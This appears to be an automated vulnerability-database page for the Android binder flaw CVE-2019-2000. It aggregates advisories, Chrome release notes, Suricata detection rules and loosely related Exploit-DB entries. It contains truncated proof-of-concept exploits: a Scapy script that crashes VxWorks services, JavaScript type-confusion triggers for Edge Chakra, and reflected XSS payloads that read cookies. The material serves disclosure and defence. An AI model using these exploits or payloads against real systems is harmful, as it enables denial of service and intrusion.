CVE-2019-2000
Published: 2019-02-28
Priority: P344 high · CVSS 3.0 score 7.8
Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 0.66% (47.1st percentile)
In several functions of binder.c, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-120025789.
Affected (3 ranges)

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| android | android | — | — |
| android | — | — | — |
| chrome_chrome | — | — | — |
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.8 | HIGH | CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |
| osv | — | 7.8 | HIGH | — |
| vendor_redhat | — | 7.5 | HIGH | — |
GHSA
CVE-2019-2000 [HIGH] CWE-787 GHSA-xqxh-7jrj-2mvm
ghsa_unreviewed · 2022-05-13
In several functions of binder.c, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-120025789.
OSV
CVE-2019-2000 [HIGH]
osv · 2019-02-28 · CVSS 7.8
In several functions of binder.c, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-120025789.
Chrome
CVE-2021-21135 [MEDIUM] Stable Channel Update for Desktop
vendor_chrome · 2021-01-19 · CVSS 6.5 · Severity: medium
CVE-2021-21135: Inappropriate implementation in Performance API. Reported by ndevtk on 2020-12-11
[$2000][1038002] Low CVE-2021-21136: Insufficient policy enforcement in WebView. Reported by Shiv Sahni, Movnavinothan V and Imdad Mohammed on 2019-12-27
[$500][1093791] Low CVE-2021-21137: Inappropriate implementation in DevTools
Chrome
CVE-2020-6430 [MEDIUM] Stable Channel Update for Desktop
vendor_chrome · 2020-04-07 · CVSS 8.8 · Severity: medium
CVE-2020-6430: Type Confusion in V8. Reported by Avihay Cohen @ SeraphicAlgorithms on 2019-12-06
[$2000][1040755] Medium CVE-2020-6456: Insufficient validation of untrusted input in clipboard. Reported by Michał Bentkowski of Securitum on 2020-01-10
Chrome
CVE-2020-6396 [MEDIUM] Stable Channel Update for Desktop
vendor_chrome · 2020-02-04 · CVSS 4.3 · Severity: medium
CVE-2020-6396: Inappropriate implementation in Skia. Reported by William Luc Ritchie on 2019-12-18
[$2000][1027408] Medium CVE-2020-6397: Incorrect security UI in sharing. Reported by Khalil Zhani on 2019-11-22
Chrome
CVE-2020-6398 [MEDIUM] Stable Channel Update for Desktop
vendor_chrome · 2020-02-04 · CVSS 8.8 · Severity: medium
CVE-2020-6398: Uninitialized use in PDFium. Reported by pdknsk on 2019-12-09
[$2000][1039869] Medium CVE-2020-6399: Insufficient policy enforcement in AppCache. Reported by Luan Herrera (@lbherrera_) on 2020-01-07
Chrome
CVE-2020-6381 [HIGH] Stable Channel Update for Desktop
vendor_chrome · 2020-02-04 · CVSS 8.8 · Severity: high
CVE-2020-6381: Integer overflow in JavaScript. Reported by The UK's National Cyber Security Centre (NCSC) on 2019-12-09
[$2000][1031909] High CVE-2020-6382: Type Confusion in JavaScript. Reported by Soyeon Park and Wen Xu from SSLab, Gatech on 2019-12-08
Chrome
CVE-2020-6378 [CRITICAL] Stable Channel Update for Desktop
vendor_chrome · 2020-01-16 · CVSS 8.8 · Severity: critical
CVE-2020-6378: Use-after-free in speech recognizer. Reported by Antti Levomäki and Christian Jalio from Forcepoint on 2019-10-28
[$2000][1033407] High CVE-2020-6379: Use-after-free in speech recognizer. Reported by Guang Gong of Alpha Team, Qihoo 360 on 2019-12-12
Chrome
CVE-2019-13741 [MEDIUM] Stable Channel Update for Desktop
vendor_chrome · 2019-12-10 · CVSS 8.8 · Severity: medium
CVE-2019-13741: Insufficient validation of untrusted input in Blink. Reported by Michał Bentkowski of Securitum on 2019-10-07
[$2000][1017564] Medium CVE-2019-13742: Incorrect security UI in Omnibox. Reported by Khalil Zhani on 2019-10-24
Chrome
CVE-2019-13739 [MEDIUM] Stable Channel Update for Desktop
vendor_chrome · 2019-12-10 · CVSS 6.5 · Severity: medium
CVE-2019-13739: Incorrect security UI in Omnibox. Reported by xisigr of Tencent's Xuanwu Lab on 2018-03-22
[$2000][1005596] Medium CVE-2019-13740: Incorrect security UI in sharing. Reported by Khalil Zhani on 2019-09-19
Chrome
CVE-2019-13705 [MEDIUM] Stable Channel Update for Desktop
vendor_chrome · 2019-10-22 · CVSS 4.3 · Severity: medium
CVE-2019-13705: Extension permission bypass. Reported by Luan Herrera (@lbherrera_) on 2019-07-30
[$2000][1001159] Medium CVE-2019-13706: Out-of-bounds read in PDFium. Reported by pdknsk on 2019-09-05
Chrome
CVE-2019-13713 [MEDIUM] Stable Channel Update for Desktop
vendor_chrome · 2019-10-22 · CVSS 6.5 · Severity: medium
CVE-2019-13713: Cross-origin data leak. Reported by David Erceg on 2019-08-13
[$2000][982812] Low CVE-2019-13714: CSS injection. Reported by Jun Kokatsu, Microsoft Browser Vulnerability Research on 2019-07-10
Red Hat
CVE-2019-20421 [HIGH] CWE-835 exiv2: infinite loop and hang in Jp2Image::readMetadata() in jp2image.cpp could lead to DoS
vendor_redhat · 2019-09-30 · CVSS 7.5
In Jp2Image::readMetadata() in jp2image.cpp in Exiv2 0.27.2, an input file can result in an infinite loop and hang, with high CPU consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
A denial of service vulnerability was found in exiv2 in the way JPEG 2000 (JP2) metadata was read when processing an image file. A remote attacker could abuse this flaw to create a specially crafted image, causing exiv2 to enter into an infinite loop when processing an incoming malicious image.
Statement: This flaw did not affect the versions of exiv2 as shipped with Red Hat Enterprise Linux 6, 7, and 8 as they did not include the vulnerable code, which was
Chrome
CVE-2019-5879 [MEDIUM] Stable Channel Update for Desktop
vendor_chrome · 2019-09-10 · CVSS 6.5 · Severity: medium
CVE-2019-5879: Extensions can read some local files. Reported by Jinseo Kim on 2019-07-20
[$2000][831725] Medium CVE-2019-5880: SameSite cookie bypass. Reported by Jun Kokatsu (@shhnjk) on 2018-04-11
Chrome
CVE-2019-5880 [MEDIUM] Stable Channel Update for Desktop
vendor_chrome · 2019-09-10 · CVSS 7.4 · Severity: medium
CVE-2019-5880: Insufficient policy enforcement in cookies. Reported by Isaac Dawson on 2018-01-18
[$2000][709946] Medium CVE-2019-5880: Insufficient policy enforcement in cookies. Reported by Gertjan Franken on 2017-04-10
Android
CVE-2019-2000 [HIGH] Binder driver
vendor_android · 2019-02-01 · CVSS 7.8
Android Security Bulletin 2019-02-01
CVE: CVE-2019-2000
Severity: HIGH
Type: EoP
Component: Binder driver
References: A-120025789*
Suricata
CVE-2000-0666 GPL RPC STATD UDP monitor mon_name format string exploit attempt
suricata · 2010-09-23
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC STATD UDP monitor mon_name format string exploit attempt"; content:"|00 01 86 B8|"; depth:4; offset:12; content:"|00 00 00 02|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,100,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,1480; reference:cve,2000-0666; classtype:attempted-admin; sid:2101915; rev:10; metadata:created_at 2010_09_23, cve CVE_2000_0666, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
CVE-2000-1042 GPL RPC portmap ypserv request UDP
suricata · 2010-09-23
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 111 (msg:"GPL RPC portmap ypserv request UDP"; content:"|00 01 86 A0|"; depth:4; offset:12; content:"|00 00 00 03|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; content:"|00 01 86 A4|"; within:4; content:"|00 00 00 00|"; depth:4; offset:4; reference:arachnids,12; reference:bugtraq,5914; reference:bugtraq,6016; reference:cve,2000-1042; reference:cve,2000-1043; reference:cve,2002-1232; classtype:rpc-portmap-decode; sid:2100590; rev:13; metadata:created_at 2010_09_23, cve CVE_2000_1042, signature_severity Informational, updated_at 2019_07_26;)
Suricata
CVE-2000-0284 GPL IMAP find overflow attempt
suricata · 2010-09-23
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP find overflow attempt"; flow:established,to_server; content:"FIND"; nocase; isdataat:100,relative; pcre:"/\sFIND\s[^\n]{100}/smi"; reference:bugtraq,1110; reference:cve,2000-0284; reference:nessus,10374; classtype:misc-attack; sid:2101904; rev:8; metadata:created_at 2010_09_23, cve CVE_2000_0284, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
CVE-2000-0666 GPL RPC STATD UDP stat mon_name format string exploit attempt
suricata · 2010-09-23
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC STATD UDP stat mon_name format string exploit attempt"; content:"|00 01 86 B8|"; depth:4; offset:12; content:"|00 00 00 01|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,100,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,1480; reference:cve,2000-0666; classtype:attempted-admin; sid:2101913; rev:11; metadata:created_at 2010_09_23, cve CVE_2000_0666, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
CVE-2000-0284 GPL IMAP rename overflow attempt
suricata · 2010-09-23
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP rename overflow attempt"; flow:established,to_server; content:"RENAME"; nocase; isdataat:100,relative; pcre:"/\sRENAME\s[^\n]{100}/smi"; reference:bugtraq,1110; reference:cve,2000-0284; reference:nessus,10374; classtype:misc-attack; sid:2101903; rev:9; metadata:created_at 2010_09_23, cve CVE_2000_0284, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
CVE-2019-8016 Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators
exploitdb · 2019-08-15
---
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop software such
Exploit-DB
CVE-2019-8017 Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts
exploitdb · 2019-08-15
---
-----=====[ Background ]=====-----
We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop software such a
Exploit-DB
CVE-2019-12255 [CRITICAL] VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
exploitdb · 2019-08-12 · CVSS 9.8
---
```python
# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability
# Discovered By: Armis Security
# PoC Author: Zhou Yu (twitter: @504137480)
# Vendor Homepage: https://www.windriver.com
# Tested on: VxWorks 6.8
# CVE: CVE-2019-12255
# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255
# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
from scapy.all import *

if __name__ == "__main__":
    ip = "192.168.10.199"
    dport = 23
    seq_num = 1000
    payload = "\x42"*2000
    sport = random.randint(1024,65535)
    syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
    syn_ack = sr1(syn)
    seq_num = seq_num + 1
    ack_num = syn
```
Exploit-DB
CVE-2019-1121 Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Unbounded iFD
exploitdb · 2019-07-10
---
-----=====[ Background ]=====-----
At the time of this writing, based on the available source code, we conclude that AF
Exploit-DB
CVE-2019-1128 Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readCharset
exploitdb · 2019-07-10
---
-----=====[ Background ]=====-----
At the time of this writing, based on the available source code, we conclude that AFDKO was origina
Exploit-DB
CVE-2019-1127 Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative nAxes
exploitdb · 2019-07-10
---
-----=====[ Background ]=====-----
At the time of this writing, based on the available source code, we conclude that AFDKO was originally
Exploit-DB
CVE-2019-1118 Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth
exploitdb · 2019-07-10
---
-----=====[ Background ]=====-----
At the time of this writing, based on the available source code, we conclude that AFDKO was o
Exploit-DB
CVE-2019-1123 Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling While Processing CFF Blend DICT Operator
exploitdb · 2019-07-10
---
-----=====[ Background ]=====-----
At the time of this writing, based on the available source code, we conclude that A
Exploit-DB
CVE-2019-1119 Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray
exploitdb · 2019-07-10
---
-----=====[ Background ]=====-----
At the time of this writing, based on the available source code, we conclude that AF
Exploit-DB
CVE-2019-1117 Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling due to Out-of-Bounds cubeStackDepth
exploitdb · 2019-07-10
---
-----=====[ Background ]=====-----
At the time of this writing, based on the available source code, we conclude that AFDKO w
Exploit-DB
CVE-2019-1122 Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readStrings
exploitdb · 2019-07-10
---
-----=====[ Background ]=====-----
At the time of this writing, based on the available source code, we conclude that AFDKO was origina
Exploit-DB
CVE-2019-1120 Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readFDSelect
exploitdb · 2019-07-10
---
-----=====[ Background ]=====-----
At the time of this writing, based on the available source code, we conclude that AFDKO was origin
Exploit-DB
CVE-2019-1124 Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings
exploitdb · 2019-07-10
---
-----=====[ Background ]=====-----
At the time of this writing, based on the available source code, we conclude tha
Exploit-DB
CVE-2019-9593 [MEDIUM] ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities
exploitdb · 2019-04-08 · CVSS 6.1
ShoreTel Connect ONSITE alert(1)y0gpy&page=ACCOUNT
Affected Parameter: brandUrl
Vulnerability 2: Reflected XSS
Affected URL:
/index.php/" onmouseover%3dalert(document.cookie) style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b
Affected Parameter: url
Affected Version 19.45.1602.0
Vulnerability 3: Reflected XSS
/site/?page=jtqv8">alert(1)bi14e
Affected Parameter: page
Affected Version:18.82.2000.0
```http
GET /site/?page=jtqv8">alert(1)bi14e HTTP/1.1
Host: hostnamem
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bdrsconference.bdrs.com/signin.php
Cookie: PHPSESS
```
Exploit-DB
CVE-2019-2000 Android - binder Use-After-Free via fdget() Optimization
exploitdb · 2019-02-12
---
This bug report describes *two* different issues in different branches of the
binder kernel code.
The first issue is in the upstream Linux kernel,
commit 7f3dc0088b98 ("binder: fix proc->files use-after-free");
the second issue is in the wahoo kernel (and maybe elsewhere? but at least the
android common kernel for 4.4 doesn't seem to contain this code...),
commit 1b652c7c29b7 ("FROMLIST: binder: fix proc->files use-after-free")
(WARNING: NOT the same as "UPSTREAM: binder: fix proc->files use-after-free" in
the android common kernel!).
Some background: In the Linux kernel, normally, when a `struct file *` is read
from the file descriptor table, the reference counter of the `struct file` is
bumped to account for the extra refere
Exploit-DB
CVE-2019-0539 Microsoft Edge Chakra - 'InitClass' Type Confusion
exploitdb · 2019-01-18
---
```javascript
/*
Issue description
This is similar to issue 1702 (https://www.exploit-db.com/exploits/46203). This time, it uses an InitClass instruction to reach the SetIsPrototype method.
PoC:
*/
function opt(o, c, value) {
    o.b = 1;
    class A extends c {
    }
    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, (function () {}), {});
    }
    let o = {a: 1, b: 2};
    let cons = function () {};
    cons.prototype = o;
    opt(o, cons, 0x1234);
    print(o.a);
}

main();
```
Exploit-DB
CVE-2019-0567 Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion
exploitdb · 2019-01-18
---
NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.
In the PoC, it overwrites the pointer to property slots with 0x1000000001234.
PoC for NewScObjectNoCtor:
```javascript
function cons() {
}

function opt(o, value) {
    o.b = 1;
    new cons();
    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        cons.prototype = {};
        let o = {a: 1, b: 2};
        opt(o, {});
    }
    let o = {a: 1, b: 2};
    cons.prototype = o;
    opt(o, 0x1234);
    print(o.a);
}

main();
```
PoC for InitProto:
```javascript
function opt(o, proto, value) {
    o.b = 1;
    let tmp = {__proto__:
```
Talos
[HIGH] Vulnerability Spotlight: Code execution vulnerability in Microsoft Excel
blogs_talos · 2020-02-11 · CVSS 8.8
Marcin Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.
Microsoft Excel contains a code execution vulnerability. This specific bug lies in the component of Excel that handles the Microsoft Office HTML and XML file types, first introduced in Office 2000.
Microsoft disclosed this vulnerability in this month’s Patch Tuesday. For more on the updates Microsoft released, read Talos’ full blog here.
In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.
### Vulnerability details
Microsoft Office Excel Ordinal43 code execution vulnerability (TALOS-2019-0968/CVE-2020-0759)
An exploitable use-after-free vulnerability exists in Excel in Microsoft